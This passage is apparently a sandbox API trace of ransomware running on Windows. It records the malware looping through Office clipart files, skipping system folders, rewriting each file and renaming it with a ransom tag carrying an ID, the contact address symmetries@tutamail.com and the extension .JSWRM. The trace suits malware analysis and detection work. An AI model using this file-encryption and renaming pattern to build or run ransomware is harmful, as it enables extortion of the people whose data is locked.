[0086.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.577] CloseHandle (hObject=0x314) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0086.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0086.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.578] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8420, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185798.WMF", cAlternateFileName="")) returned 1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2=".") returned 1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="..") returned 1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="...") returned 1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="windows") returned -1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="recovery") returned -1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="perflogs") returned -1 [0086.578] lstrcmpiW (lpString1="J0185798.WMF", lpString2="documents and settings") returned 1 [0086.579] lstrcmpiW (lpString1="J0185798.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.579] lstrcmpiW (lpString1="J0185798.WMF", lpString2="system volume information") returned -1 [0086.579] lstrcmpiW (lpString1="J0185798.WMF", lpString2="msocache") returned -1 [0086.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185798.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185798.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185798.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0086.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185798.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185798.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185798.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0086.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0086.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.580] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33824) returned 1 [0086.580] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8420) returned 0x24d210 [0086.580] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8420, lpOverlapped=0x0) returned 1 [0086.584] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.584] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8420, lpOverlapped=0x0) returned 1 [0086.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.585] CloseHandle (hObject=0x314) returned 1 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0086.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0086.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0086.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.586] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5eae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185800.WMF", cAlternateFileName="")) returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2=".") returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="..") returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="...") returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="windows") returned -1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="recovery") returned -1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="perflogs") returned -1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="documents and settings") returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.586] lstrcmpiW (lpString1="J0185800.WMF", lpString2="system volume information") returned -1 [0086.587] lstrcmpiW (lpString1="J0185800.WMF", lpString2="msocache") returned -1 [0086.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185800.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185800.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185800.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0086.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185800.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185800.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185800.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0086.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.587] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24238) returned 1 [0086.587] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ea0) returned 0x24d210 [0086.588] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5ea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5ea0, lpOverlapped=0x0) returned 1 [0086.633] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.634] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5ea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5ea0, lpOverlapped=0x0) returned 1 [0086.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.634] CloseHandle (hObject=0x314) returned 1 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0086.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0086.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.636] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x773a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185806.WMF", cAlternateFileName="")) returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2=".") returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="..") returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="...") returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="windows") returned -1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="recovery") returned -1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="perflogs") returned -1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="documents and settings") returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="system volume information") returned -1 [0086.636] lstrcmpiW (lpString1="J0185806.WMF", lpString2="msocache") returned -1 [0086.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185806.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185806.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185806.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0086.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185806.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185806.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185806.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0086.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0086.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30522) returned 1 [0086.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7730) returned 0x24d210 [0086.660] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7730, lpOverlapped=0x0) returned 1 [0086.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.724] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7730, lpOverlapped=0x0) returned 1 [0086.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.737] CloseHandle (hObject=0x314) returned 1 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0086.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0086.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0086.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf"), lpNewFileName="C:\\Program Files\\Microsoft 